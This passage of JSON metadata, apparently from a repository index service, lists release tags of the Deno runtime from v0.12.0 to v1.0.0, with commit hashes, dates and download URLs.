":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"